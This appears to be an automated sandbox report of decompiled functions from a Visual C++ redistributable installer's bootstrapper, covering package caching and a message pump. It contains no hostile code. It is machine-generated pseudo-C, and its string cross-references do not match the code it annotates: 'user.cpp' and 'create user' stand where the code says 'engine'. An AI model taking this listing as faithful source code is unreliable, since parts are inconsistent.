                                                                          • String ID: @Met$BootstrapperApplicationCreate$Failed to create UX.$Failed to get BootstrapperApplicationCreate entry-point$Failed to load UX DLL.$userexperience.cpp$wininet.dll
                                                                          • API String ID: 1866314245-3673390192
                                                                          • Opcode ID: d7dcdabc52337f2a0532f67ba4d6b3be9d17f0a59ddd2bfa935308b95ec9a6ad
                                                                          • Instruction ID: 167fdd32b57b788d587ef7df5493587600f4c1a9549c562faa9c098b23b8f45a
                                                                          • Opcode Fuzzy Hash: d7dcdabc52337f2a0532f67ba4d6b3be9d17f0a59ddd2bfa935308b95ec9a6ad
                                                                          • Instruction Fuzzy Hash: 6311C632A40726ABEB215A699C05FB777D4AF04750F01413AFE09E7A90EB25CC00EAD4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 67%
                                                                          			E000DB2F6(intOrPtr __edx, void* __eflags, intOrPtr _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, intOrPtr* _a28) {
                                                                          				intOrPtr _v8;
                                                                          				signed int _v12;
                                                                          				signed int _v16;
                                                                          				signed int _v20;
                                                                          				signed int _v24;
                                                                          				signed int _v28;
                                                                          				signed int _v32;
                                                                          				signed int _v36;
                                                                          				signed int _v40;
                                                                          				signed int _v44;
                                                                          				signed int _v48;
                                                                          				signed int _v52;
                                                                          				signed int _v56;
                                                                          				intOrPtr _v60;
                                                                          				signed int _v64;
                                                                          				void* __ebx;
                                                                          				signed int __edi;
                                                                          				signed int __esi;
                                                                          				intOrPtr* _t240;
                                                                          				signed int _t244;
                                                                          				signed int _t245;
                                                                          				signed int _t247;
                                                                          				intOrPtr* _t252;
                                                                          				intOrPtr _t253;
                                                                          				intOrPtr* _t256;
                                                                          				void* _t258;
                                                                          				signed int _t259;
                                                                          				signed int _t263;
                                                                          				signed int _t273;
                                                                          				intOrPtr _t279;
                                                                          				signed int _t280;
                                                                          				void* _t283;
                                                                          				void* _t290;
                                                                          				signed int _t291;
                                                                          				intOrPtr* _t294;
                                                                          				void* _t295;
                                                                          				signed int _t296;
                                                                          				signed int _t298;
                                                                          				intOrPtr _t300;
                                                                          				signed int _t301;
                                                                          				void* _t302;
                                                                          
                                                                          				_t289 = __edx;
                                                                          				_v64 = _v64 & 0x00000000;
                                                                          				asm("xorps xmm0, xmm0");
                                                                          				_v28 = 0x80000000;
                                                                          				_v40 = 0x80000000;
                                                                          				_t240 =  *((intOrPtr*)(_a8 + 0x10));
                                                                          				_v44 = 0x80000000;
                                                                          				_t291 = 0;
                                                                          				asm("movlpd [ebp-0x38], xmm0");
                                                                          				_v16 = 0;
                                                                          				_t296 = E000BD542(_a8, 0, 1,  *((intOrPtr*)( *_t240 + 0x88))(_t240, _t290, _t295));
                                                                          				_v20 = _t296;
                                                                          				if(_t296 >= 0) {
                                                                          					_t289 = _v60;
                                                                          					_t283 = _v56;
                                                                          					_t279 = _a16;
                                                                          					_v8 = _v60;
                                                                          					while(1) {
                                                                          						L3:
                                                                          						_v12 = _t283;
                                                                          						while(1) {
                                                                          							_v32 = 0x80000000;
                                                                          							_v56 = _v56 & 0;
                                                                          							_v36 = 0;
                                                                          							_t244 = _v28;
                                                                          							__eflags = _t244 - 0x80000000;
                                                                          							_v20 = 0;
                                                                          							_t245 =  ==  ? 0 : _t244;
                                                                          							_t298 = _t245 * 0x28;
                                                                          							__eflags = _t298;
                                                                          							_v48 = _t245;
                                                                          							_v52 = _t298;
                                                                          							_t296 = _v20;
                                                                          							while(1) {
                                                                          								L5:
                                                                          								__eflags = _t245 -  *((intOrPtr*)(_t279 + 0x50));
                                                                          								if(_t245 >=  *((intOrPtr*)(_t279 + 0x50))) {
                                                                          									break;
                                                                          								}
                                                                          								_t294 =  *((intOrPtr*)(_t279 + 0x4c)) + _v52;
                                                                          								_v24 = _v24 & 0x00000000;
                                                                          								__eflags =  *(_t294 + 4);
                                                                          								if( *(_t294 + 4) == 0) {
                                                                          									L9:
                                                                          									_t273 =  *_t294 - 1;
                                                                          									__eflags = _t273 - 0xb;
                                                                          									if(_t273 > 0xb) {
                                                                          										L48:
                                                                          										_t291 = _v16;
                                                                          										L49:
                                                                          										_v52 = _v52 + 0x28;
                                                                          										_t245 = _v48 + 1;
                                                                          										_v48 = _t245;
                                                                          										__eflags = _t296;
                                                                          										if(_t296 >= 0) {
                                                                          											continue;
                                                                          										}
                                                                          										break;
                                                                          									}
                                                                          									switch( *((intOrPtr*)(_t273 * 4 +  &M000DB932))) {
                                                                          										case 0:
                                                                          											__eax =  *(__edi + 8);
                                                                          											_v64 =  *(__edi + 8);
                                                                          											goto L48;
                                                                          										case 1:
                                                                          											__esi = E000DACD6(_a8, _a12, _a20,  *(__edi + 8),  *(__edi + 0xc),  *(__edi + 0x10), __edx, __ecx,  *((intOrPtr*)(__ebx + 0x20)),  *((intOrPtr*)(__ebx + 0x24)));
                                                                          											_v20 = __esi;
                                                                          											__eflags = __esi;
                                                                          											if(__esi < 0) {
                                                                          												goto L46;
                                                                          											}
                                                                          											_v8 = _v8 +  *(__edi + 0x18);
                                                                          											_v8 = _v8 +  *(__edi + 0x18);
                                                                          											__eax = _v12;
                                                                          											asm("adc eax, [edi+0x1c]");
                                                                          											__edi = 0;
                                                                          											__eax = _a24;
                                                                          											 *_a24 =  *_a24 + 1;
                                                                          											__esi = E000DB2C3(_a8, 0,  *((intOrPtr*)(__ebx + 0x34)),  *_a24);
                                                                          											_v20 = __esi;
                                                                          											__eflags = __esi;
                                                                          											if(__eflags >= 0) {
                                                                          												goto L46;
                                                                          											}
                                                                          											_push(0);
                                                                          											_push(0);
                                                                          											_push(L"layout bundle");
                                                                          											_push(0);
                                                                          											goto L16;
                                                                          										case 2:
                                                                          											_push( *((intOrPtr*)(__edi + 0x14)));
                                                                          											__eax = _v48;
                                                                          											_push( *(__edi + 0x10));
                                                                          											__esi = _a8;
                                                                          											_push( *(__edi + 0xc));
                                                                          											_v40 = _v48;
                                                                          											__eax =  *(__edi + 0x18);
                                                                          											_v44 =  *(__edi + 0x18);
                                                                          											__eax =  *(__edi + 8);
                                                                          											_v16 =  *(__edi + 8);
                                                                          											__eax =  *((intOrPtr*)(_a8 + 0x10));
                                                                          											__edi = _v16;
                                                                          											__ecx =  *__eax;
                                                                          											_push( *__edi);
                                                                          											_push(__eax); // executed
                                                                          											__eax =  *((intOrPtr*)( *__eax + 0x8c))();
                                                                          											__esi = __eax;
                                                                          											_v20 = __esi;
                                                                          											__eflags = __esi;
                                                                          											if(__eflags < 0) {
                                                                          												__eax = E000F00CF(__edx, __eflags, __esi, 0xe0000038, 0, L"begin cache package",  *__edi, 0);
                                                                          											}
                                                                          											goto L20;
                                                                          										case 3:
                                                                          											__eax = _a24;
                                                                          											__edi = _a8;
                                                                          											 *_a24 =  *_a24 + 1;
                                                                          											__esi = E000DB2C3(__edi, 0,  *((intOrPtr*)(__ebx + 0x34)),  *_a24 + 1);
                                                                          											_v20 = __esi;
                                                                          											__eflags = __esi;
                                                                          											if(__eflags >= 0) {
                                                                          												__eax = _a24;
                                                                          												_push(0);
                                                                          												_push(__esi);
                                                                          												 *_a24 =  *_a24 + 1;
                                                                          												__eax =  *(__edi + 0x10);
                                                                          												__edi = _v16;
                                                                          												__ecx =  *__eax;
                                                                          												_push( *__edi);
                                                                          												_push(__eax);
                                                                          												__eax =  *((intOrPtr*)( *__eax + 0xa8))();
                                                                          												 *(__edi + 0x78) = __esi;
                                                                          												__eax = 0x80000000;
                                                                          												__edi = 0;
                                                                          												_v40 = 0x80000000;
                                                                          												_v44 = 0x80000000;
                                                                          												_v16 = 0;
                                                                          												L20:
                                                                          												__ecx = _v12;
                                                                          												__edx = _v8;
                                                                          												goto L49;
                                                                          											}
                                                                          											__eax = 0;
                                                                          											_push(0);
                                                                          											_push(0);
                                                                          											_push(L"end cache package");
                                                                          											_push(0);
                                                                          											L16:
                                                                          											_push(0xe0000038);
                                                                          											goto L17;
                                                                          										case 4:
                                                                          											goto L48;
                                                                          										case 5:
                                                                          											__eax = SetEvent( *(__edi + 8));
                                                                          											__eflags = __eax;
                                                                          											if(__eax == 0) {
                                                                          												__eax = GetLastError();
                                                                          												__ax & 0x0000ffff = __ax & 0x0000ffff | 0x80070000;
                                                                          												__eflags = __eax;
                                                                          												__esi =  <=  ? __eax : __ax & 0x0000ffff | 0x80070000;
                                                                          												__eax = 0x80004005;
                                                                          												__eflags = __esi;
                                                                          												__esi =  >=  ? 0x80004005 : __esi;
                                                                          												_v20 = __esi;
                                                                          												__eax = E000B37D3(0x80004005, "apply.cpp", 0x270, __esi);
                                                                          												_push("Failed to set syncpoint event.");
                                                                          												_push(__esi);
                                                                          												__eax = E000F012F();
                                                                          												goto L68;
                                                                          											}
                                                                          											goto L46;
                                                                          										case 6:
                                                                          											__esi = E000D951C(_a8, _a12,  *(__edi + 8), 0, 0,  *(__edi + 0xc), __edx, __ecx,  *((intOrPtr*)(__ebx + 0x20)),  *((intOrPtr*)(__ebx + 0x24)));
                                                                          											__eax =  *(__edi + 8);
                                                                          											_v20 = __esi;
                                                                          											__eflags = __esi;
                                                                          											if(__eflags < 0) {
                                                                          												_push(0);
                                                                          												_push( *(__edi + 0xc));
                                                                          												_push( *__eax);
                                                                          												_push(0);
                                                                          												_push(0xe0000137);
                                                                          												goto L17;
                                                                          											}
                                                                          											__edx = _v8;
                                                                          											__edx = _v8 +  *((intOrPtr*)(__eax + 0x18));
                                                                          											__ecx = _v12;
                                                                          											asm("adc ecx, [eax+0x1c]");
                                                                          											goto L23;
                                                                          										case 7:
                                                                          											__eax =  *(__edi + 0x18);
                                                                          											__eflags = __eax - 0x80000000;
                                                                          											if(__eax == 0x80000000) {
                                                                          												L28:
                                                                          												__eax = E000DAAE8(__ebx, __ecx, _a4,  *(__edi + 8),  *((intOrPtr*)(__edi + 0x1c)),  *((intOrPtr*)(__edi + 0x20)),  *((intOrPtr*)(__edi + 0x24))); // executed
                                                                          												__esi = __eax;
                                                                          												_v20 = __esi;
                                                                          												__eflags = __esi;
                                                                          												if(__eflags < 0) {
                                                                          													__eax =  *(__edi + 8);
                                                                          													_push(0);
                                                                          													_push( *((intOrPtr*)(__edi + 0x1c)));
                                                                          													_push( *( *(__edi + 8)));
                                                                          													_push(0);
                                                                          													_push(0xe0000138);
                                                                          													goto L17;
                                                                          												}
                                                                          												__edx = _v8;
                                                                          												L27:
                                                                          												__edx = __edx +  *(__edi + 0x10);
                                                                          												__ecx = _v12;
                                                                          												asm("adc ecx, [edi+0x14]");
                                                                          												goto L23;
                                                                          											}
                                                                          											__ecx = __eax * 0x28;
                                                                          											__eax =  *(__ebx + 0x4c);
                                                                          											__eflags =  *(__ecx + __eax + 4);
                                                                          											if( *(__ecx + __eax + 4) == 0) {
                                                                          												goto L28;
                                                                          											}
                                                                          											goto L27;
                                                                          										case 8:
                                                                          											__eax =  &_v24;
                                                                          											__esi = E000DAF54(_a8, _a20,  *(__edi + 0xc),  *(__edi + 8), 0, __edx, __ecx,  *((intOrPtr*)(__ebx + 0x20)),  *((intOrPtr*)(__ebx + 0x24)),  *(__edi + 0x18),  *((intOrPtr*)(__edi + 0x1c)),  *((intOrPtr*)(__edi + 0x20)),  *((intOrPtr*)(__edi + 0x14)),  &_v24);
                                                                          											_v20 = __esi;
                                                                          											__eflags = __esi;
                                                                          											if(__eflags >= 0) {
                                                                          												goto L46;
                                                                          											}
                                                                          											_push( *((intOrPtr*)(__edi + 0x1c)));
                                                                          											__eax =  *(__edi + 0xc);
                                                                          											_push( *(__edi + 0x18));
                                                                          											_push( *( *(__edi + 0xc)));
                                                                          											_push(0);
                                                                          											_push(0xe000013c);
                                                                          											goto L33;
                                                                          										case 9:
                                                                          											__esi = E000D951C(_a8, _a12, 0,  *(__edi + 8),  *(__edi + 0xc),  *(__edi + 0x10), __edx, __ecx,  *((intOrPtr*)(__ebx + 0x20)),  *((intOrPtr*)(__ebx + 0x24)));
                                                                          											__eax =  *(__edi + 0xc);
                                                                          											_v20 = __esi;
                                                                          											__eflags = __esi;
                                                                          											if(__eflags < 0) {
                                                                          												_push(0);
                                                                          												_push( *(__edi + 0x10));
                                                                          												_push( *__eax);
                                                                          												_push(0);
                                                                          												_push(0xe0000139);
                                                                          												L17:
                                                                          												_push(__esi);
                                                                          												__eax = E000F00CF(__edx, __eflags);
                                                                          												goto L46;
                                                                          											}
                                                                          											__edx = _v8;
                                                                          											__edx = _v8 +  *((intOrPtr*)(__eax + 0x10));
                                                                          											__ecx = _v12;
                                                                          											asm("adc ecx, [eax+0x14]");
                                                                          											L23:
                                                                          											_v8 = __edx;
                                                                          											_v12 = __ecx;
                                                                          											goto L48;
                                                                          										case 0xa:
                                                                          											__ecx =  *(__edi + 8);
                                                                          											 &_v24 = _v12;
                                                                          											__esi = 0;
                                                                          											__eax = _v12 | 0xffffffff;
                                                                          											__eflags =  *( *(__edi + 8) + 0x14);
                                                                          											__eax =  !=  ? _a20 : _v12 | 0xffffffff;
                                                                          											__eax = E000DAF54(_a8,  !=  ? _a20 : _v12 | 0xffffffff, 0,  *(__edi + 8),  *(__edi + 0xc), __edx,  !=  ? _a20 : _v12 | 0xffffffff,  *((intOrPtr*)(__ebx + 0x20)),  *((intOrPtr*)(__ebx + 0x24)), 0,  *(__edi + 0x18),  *((intOrPtr*)(__edi + 0x1c)),  *((intOrPtr*)(__edi + 0x14)),  &_v24); // executed
                                                                          											__esi = __eax;
                                                                          											_v20 = __esi;
                                                                          											__eflags = __esi;
                                                                          											if(__eflags >= 0) {
                                                                          												goto L46;
                                                                          											}
                                                                          											__eax =  *(__edi + 0xc);
                                                                          											_push(0);
                                                                          											_push( *(__edi + 0x18));
                                                                          											_push( *( *(__edi + 0xc)));
                                                                          											_push(0);
                                                                          											_push(0xe000013a);
                                                                          											goto L33;
                                                                          										case 0xb:
                                                                          											__eax =  &_v24;
                                                                          											__esi = E000DAF54(_a8, _a20, 0,  *(__edi + 8),  *(__edi + 0xc), __edx, __ecx,  *((intOrPtr*)(__ebx + 0x20)),  *((intOrPtr*)(__ebx + 0x24)),  *(__edi + 0x18),  *((intOrPtr*)(__edi + 0x1c)),  *((intOrPtr*)(__edi + 0x20)),  *((intOrPtr*)(__edi + 0x14)),  &_v24);
                                                                          											_v20 = __esi;
                                                                          											__eflags = __esi;
                                                                          											if(__eflags >= 0) {
                                                                          												L46:
                                                                          												__ecx = _v12;
                                                                          												L47:
                                                                          												_t289 = _v8;
                                                                          												goto L48;
                                                                          											}
                                                                          											_push( *((intOrPtr*)(__edi + 0x1c)));
                                                                          											__eax =  *(__edi + 0xc);
                                                                          											_push( *(__edi + 0x18));
                                                                          											_push( *( *(__edi + 0xc)));
                                                                          											_push(0);
                                                                          											_push(0xe000013d);
                                                                          											L33:
                                                                          											_push(__esi);
                                                                          											__eax = E000F00CF(__edx, __eflags);
                                                                          											__eflags = _v24;
                                                                          											__ecx = _v12;
                                                                          											__edx = _v8;
                                                                          											if(_v24 != 0) {
                                                                          												 *(__edi + 0xc) =  *( *(__edi + 0xc));
                                                                          												 *((intOrPtr*)(__edi + 0x14)) =  *((intOrPtr*)(__edi + 0x14)) + 1;
                                                                          												_v36 =  *( *(__edi + 0xc));
                                                                          												__eax =  *(__edi + 0x10);
                                                                          												_v32 =  *(__edi + 0x10);
                                                                          											}
                                                                          											goto L48;
                                                                          									}
                                                                          								}
                                                                          								__eflags = _v28 - _t245;
                                                                          								if(_v28 != _t245) {
                                                                          									_v8 = _v8 + E000DAC9A(_t294);
                                                                          									asm("adc ecx, edx");
                                                                          									_v12 = _t283;
                                                                          									goto L47;
                                                                          								}
                                                                          								_t33 = _t294 + 4;
                                                                          								 *_t33 =  *(_t294 + 4) & 0x00000000;
                                                                          								__eflags =  *_t33;
                                                                          								goto L9;
                                                                          							}
                                                                          							__eflags = _v32 - 0x80000000;
                                                                          							if(__eflags == 0) {
                                                                          								__eflags = _t291;
                                                                          								if(_t291 == 0) {
                                                                          									goto L69;
                                                                          								}
                                                                          								__eflags = _t296;
                                                                          								if(_t296 >= 0) {
                                                                          									L56:
                                                                          									_t289 = 0;
                                                                          									__eflags = 0;
                                                                          									L57:
                                                                          									_t256 =  *((intOrPtr*)(_a8 + 0x10));
                                                                          									_t258 = E000BD409(_a8, 0, 2,  *((intOrPtr*)( *_t256 + 0xa8))(_t256,  *_t291, _t296, _t289));
                                                                          									__eflags = _t296;
                                                                          									if(_t296 >= 0) {
                                                                          										L64:
                                                                          										_t259 = _v56;
                                                                          										L65:
                                                                          										 *(_t291 + 0x78) = _t296;
                                                                          										_t283 = 0x80000000;
                                                                          										_t291 = 0;
                                                                          										_v40 = 0x80000000;
                                                                          										_v44 = 0x80000000;
                                                                          										_v16 = 0;
                                                                          										__eflags = _t259;
                                                                          										if(_t259 == 0) {
                                                                          											goto L69;
                                                                          										}
                                                                          										_t283 = _v12;
                                                                          										_t289 = _v8;
                                                                          										_v32 = 0x80000000;
                                                                          										_v56 = _v56 & 0;
                                                                          										_v36 = 0;
                                                                          										_t244 = _v28;
                                                                          										__eflags = _t244 - 0x80000000;
                                                                          										_v20 = 0;
                                                                          										_t245 =  ==  ? 0 : _t244;
                                                                          										_t298 = _t245 * 0x28;
                                                                          										__eflags = _t298;
                                                                          										_v48 = _t245;
                                                                          										_v52 = _t298;
                                                                          										_t296 = _v20;
                                                                          										goto L5;
                                                                          									}
                                                                          									__eflags = _t258 - 4;
                                                                          									if(_t258 != 4) {
                                                                          										__eflags = _t258 - 5;
                                                                          										if(_t258 != 5) {
                                                                          											goto L64;
                                                                          										}
                                                                          										__eflags =  *(_t291 + 0x1c);
                                                                          										if( *(_t291 + 0x1c) != 0) {
                                                                          											goto L64;
                                                                          										}
                                                                          										_push(_t296);
                                                                          										E000B550F(2, 0xa000015e,  *_t291);
                                                                          										_t302 = _t302 + 0x10;
                                                                          										 *_a24 =  *_a24 + 1;
                                                                          										_t263 = _v44 + 1;
                                                                          										L60:
                                                                          										_v28 = _t263;
                                                                          										_t259 = 1;
                                                                          										goto L65;
                                                                          									}
                                                                          									__eflags = 0;
                                                                          									E000F00CF(_t289, 0, _t296, 0xa000015c, 0,  *_t291, 0, 0);
                                                                          									_t263 = _v40;
                                                                          									goto L60;
                                                                          								}
                                                                          								__eflags =  *(_t291 + 0x1c);
                                                                          								if( *(_t291 + 0x1c) != 0) {
                                                                          									goto L56;
                                                                          								}
                                                                          								_t289 = 5;
                                                                          								goto L57;
                                                                          							}
                                                                          							E000F00CF(_t289, __eflags, _t296, 0xa000015d, 0, _v36, 0, 0);
                                                                          							_t301 = _v32;
                                                                          							_v8 = _v8 - E000DAC9A(_t301 * 0x28 +  *((intOrPtr*)(_t279 + 0x4c)));
                                                                          							_t283 = _v12;
                                                                          							_t291 = _v16;
                                                                          							asm("sbb ecx, edx");
                                                                          							_t289 = _v8;
                                                                          							_v28 = _t301;
                                                                          							goto L3;
                                                                          						}
                                                                          					}
                                                                          				} else {
                                                                          					E000B37D3(_t242, "apply.cpp", 0x1b8, _t296);
                                                                          					_push("UX aborted cache.");
                                                                          					_push(_t296);
                                                                          					E000F012F();
                                                                          					_t279 = _a16;
                                                                          					L68:
                                                                          					_pop(_t283);
                                                                          					L69:
                                                                          					if(_t296 >= 0) {
                                                                          						L84:
                                                                          						if(_a20 != 0xffffffff) {
                                                                          							E000CCEAA(_t283, _t289, _a20);
                                                                          						}
                                                                          						E000C993E(_t279, _t283, _t289, _t291, _t296, 0,  *((intOrPtr*)(_t279 + 4))); // executed
                                                                          						_t247 =  *(_a8 + 0x10);
                                                                          						 *((intOrPtr*)( *_t247 + 0xac))(_t247, _t296);
                                                                          						return _t296;
                                                                          					}
                                                                          					_t291 = 0;
                                                                          					if( *((intOrPtr*)(_t279 + 0x58)) <= 0) {
                                                                          						L83:
                                                                          						 *_a28 = 1;
                                                                          						goto L84;
                                                                          					}
                                                                          					_t252 =  *((intOrPtr*)(_t279 + 0x54));
                                                                          					_t283 = _v64;
                                                                          					while( *_t252 != 1 ||  *((intOrPtr*)(_t252 + 8)) != _t283) {
                                                                          						_t291 = _t291 + 1;
                                                                          						_t252 = _t252 + 0x28;
                                                                          						if(_t291 <  *((intOrPtr*)(_t279 + 0x58))) {
                                                                          							continue;
                                                                          						}
                                                                          						goto L83;
                                                                          					}
                                                                          					__eflags = _t291;
                                                                          					if(_t291 == 0) {
                                                                          						goto L83;
                                                                          					}
                                                                          					_t291 = _t291 - 1;
                                                                          					__eflags = _t291;
                                                                          					if(_t291 < 0) {
                                                                          						goto L83;
                                                                          					}
                                                                          					_t300 = _a16;
                                                                          					_t280 = _t291 * 0x28;
                                                                          					__eflags = _t280;
                                                                          					do {
                                                                          						_t253 =  *((intOrPtr*)(_t300 + 0x54));
                                                                          						__eflags =  *((intOrPtr*)(_t253 + _t280)) - 5;
                                                                          						if( *((intOrPtr*)(_t253 + _t280)) == 5) {
                                                                          							E000D9A30(_a20,  *((intOrPtr*)(_t253 + _t280 + 8)));
                                                                          						}
                                                                          						_t280 = _t280 - 0x28;
                                                                          						_t291 = _t291 - 1;
                                                                          						__eflags = _t291;
                                                                          					} while (_t291 >= 0);
                                                                          					_t296 = _v20;
                                                                          					_t279 = _a16;
                                                                          					goto L83;
                                                                          				}
                                                                          			}












































                                                                          0x000db831
                                                                          0x000db836
                                                                          0x000db809
                                                                          0x000db809
                                                                          0x000db80e
                                                                          0x00000000
                                                                          0x000db80e
                                                                          0x000db7f4
                                                                          0x000db801
                                                                          0x000db806
                                                                          0x00000000
                                                                          0x000db806
                                                                          0x000db7be
                                                                          0x000db7c2
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000db7c6
                                                                          0x00000000
                                                                          0x000db7c6
                                                                          0x000db788
                                                                          0x000db78d
                                                                          0x000db79c
                                                                          0x000db79f
                                                                          0x000db7a2
                                                                          0x000db7a5
                                                                          0x000db7a7
                                                                          0x000db7aa
                                                                          0x00000000
                                                                          0x000db7aa
                                                                          0x000db372
                                                                          0x000db340
                                                                          0x000db34b
                                                                          0x000db350
                                                                          0x000db355
                                                                          0x000db356
                                                                          0x000db35b
                                                                          0x000db89a
                                                                          0x000db89b
                                                                          0x000db89c
                                                                          0x000db89e
                                                                          0x000db8fd
                                                                          0x000db901
                                                                          0x000db906
                                                                          0x000db906
                                                                          0x000db910
                                                                          0x000db919
                                                                          0x000db91f
                                                                          0x000db92d
                                                                          0x000db92d
                                                                          0x000db8a0
                                                                          0x000db8a5
                                                                          0x000db8f4
                                                                          0x000db8f7
                                                                          0x00000000
                                                                          0x000db8f7
                                                                          0x000db8a7
                                                                          0x000db8aa
                                                                          0x000db8ad
                                                                          0x000db8b7
                                                                          0x000db8b8
                                                                          0x000db8be
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000db8c0
                                                                          0x000db8c2
                                                                          0x000db8c4
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000db8c6
                                                                          0x000db8c6
                                                                          0x000db8c9
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000db8cb
                                                                          0x000db8ce
                                                                          0x000db8ce
                                                                          0x000db8d1
                                                                          0x000db8d1
                                                                          0x000db8d4
                                                                          0x000db8d8
                                                                          0x000db8e1
                                                                          0x000db8e1
                                                                          0x000db8e6
                                                                          0x000db8e9
                                                                          0x000db8e9
                                                                          0x000db8e9
                                                                          0x000db8ee
                                                                          0x000db8f1
                                                                          0x00000000
                                                                          0x000db8f1

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: ($@Met$Failed to set syncpoint event.$UX aborted cache.$apply.cpp$begin cache package$end cache package$layout bundle
                                                                          • API String ID: 0-6698178
                                                                          • Opcode ID: 73689e82dd2371dfdbd26ae6b9b8f918aea2d021cadb0489a1ed2c51759db2c8
                                                                          • Instruction ID: ba76db7c47270edf8ae13155926fd2a7d0015d24f5519aff5ada377f210c51dd
                                                                          • Opcode Fuzzy Hash: 73689e82dd2371dfdbd26ae6b9b8f918aea2d021cadb0489a1ed2c51759db2c8
                                                                          • Instruction Fuzzy Hash: 8B221571A00619FFDB15CF94C880FAEBBB6FF48710F11825AF914AB251D731A961DBA0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 36%
                                                                          			E000B4690(void* __edx, void* __eflags, intOrPtr _a4, intOrPtr* _a8) {
                                                                          				void* _v8;
                                                                          				struct tagMSG _v36;
                                                                          				void* __ebx;
                                                                          				long _t29;
                                                                          				int _t33;
                                                                          				intOrPtr* _t34;
                                                                          				int _t37;
                                                                          				intOrPtr* _t40;
                                                                          				void* _t41;
                                                                          				void* _t57;
                                                                          				signed int _t58;
                                                                          				intOrPtr* _t65;
                                                                          				void* _t68;
                                                                          				intOrPtr _t71;
                                                                          				int _t72;
                                                                          				int _t73;
                                                                          				void* _t77;
                                                                          
                                                                          				_t77 = __eflags;
                                                                          				_t68 = __edx;
                                                                          				_t58 = 7;
                                                                          				memset( &_v36, 0, _t58 << 2);
                                                                          				_v8 = 0;
                                                                          				PeekMessageW( &_v36, 0, 0x400, 0x400, 0);
                                                                          				_t29 = GetCurrentThreadId();
                                                                          				_t71 = _a4;
                                                                          				_t72 = E000CFC51( &_v8, _t68, _t77, _t71, _t29,  &_v8);
                                                                          				if(_t72 >= 0) {
                                                                          					_t33 = E000BD5C0(_t71 + 0xb8, _v8, _t71 + 0x1c); // executed
                                                                          					_t72 = _t33;
                                                                          					__eflags = _t72;
                                                                          					if(_t72 >= 0) {
                                                                          						_t34 =  *((intOrPtr*)(_t71 + 0xc8));
                                                                          						_t73 =  *((intOrPtr*)( *_t34 + 0xc))(_t34);
                                                                          						__eflags = _t73;
                                                                          						if(_t73 >= 0) {
                                                                          							_push(0);
                                                                          							_push(0);
                                                                          							_push(0);
                                                                          							_t57 = GetMessageW;
                                                                          							while(1) {
                                                                          								_t37 = GetMessageW( &_v36, ??, ??, ??);
                                                                          								__eflags = _t37;
                                                                          								if(_t37 == 0) {
                                                                          									break;
                                                                          								}
                                                                          								__eflags = _t37 - 0xffffffff;
                                                                          								if(_t37 == 0xffffffff) {
                                                                          									_t73 = 0x8000ffff;
                                                                          									E000B37D3(_t37, "engine.cpp", 0x2cd, 0x8000ffff);
                                                                          									_push("Unexpected return value from message pump.");
                                                                          									goto L7;
                                                                          								} else {
                                                                          									E000B43CD(_t57, _t71,  &_v36); // executed
                                                                          									__eflags = 0;
                                                                          									_push(0);
                                                                          									_push(0);
                                                                          									_push(0);
                                                                          									continue;
                                                                          								}
                                                                          								goto L13;
                                                                          							}
                                                                          							 *((intOrPtr*)(_t71 + 0xf8)) = _v36.wParam;
                                                                          						} else {
                                                                          							_push("Failed to start bootstrapper application.");
                                                                          							L7:
                                                                          							_push(_t73);
                                                                          							E000F012F();
                                                                          						}
                                                                          						L13:
                                                                          						_t40 =  *((intOrPtr*)(_t71 + 0xc8));
                                                                          						_t41 =  *((intOrPtr*)( *_t40 + 0x10))(_t40);
                                                                          						__eflags = _t41 - 0x66;
                                                                          						if(_t41 != 0x66) {
                                                                          							__eflags = _t41 - 0x68;
                                                                          							if(_t41 == 0x68) {
                                                                          								_push(0x20000006);
                                                                          								_push(2);
                                                                          								E000B550F();
                                                                          								 *_a8 = 1;
                                                                          								goto L18;
                                                                          							}
                                                                          						} else {
                                                                          							E000B550F(2, 0x20000004, E000C3C30( *((intOrPtr*)(_t71 + 0x18)))); // executed
                                                                          							 *((intOrPtr*)(_t71 + 0x18)) = 1;
                                                                          						}
                                                                          					} else {
                                                                          						_push("Failed to load UX.");
                                                                          						goto L2;
                                                                          					}
                                                                          				} else {
                                                                          					_push("Failed to create engine for UX.");
                                                                          					L2:
                                                                          					_push(_t72);
                                                                          					E000F012F();
                                                                          					L18:
                                                                          				}
                                                                          				E000BD7CF(_t71 + 0xb8); // executed
                                                                          				_t65 = _v8;
                                                                          				if(_t65 != 0) {
                                                                          					 *((intOrPtr*)( *_t65 + 8))(_t65);
                                                                          				}
                                                                          				return _t73;
                                                                          			}





















                                                                          APIs
                                                                          • PeekMessageW.USER32 ref: 000B46B5
                                                                          • GetCurrentThreadId.KERNEL32 ref: 000B46BB
                                                                            • Part of subcall function 000CFC51: new.LIBCMT ref: 000CFC58
                                                                          • GetMessageW.USER32(00000000,00000000,00000000,00000000), ref: 000B4749
                                                                          Strings
                                                                          • Failed to start bootstrapper application., xrefs: 000B4717
                                                                          • Failed to load UX., xrefs: 000B46FE
                                                                          • Failed to create user for UX., xrefs: 000B46D5
                                                                          • wininet.dll, xrefs: 000B46E8
                                                                          • Unexpected return value from message pump., xrefs: 000B479F
                                                                          • user.cpp, xrefs: 000B4795
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmp
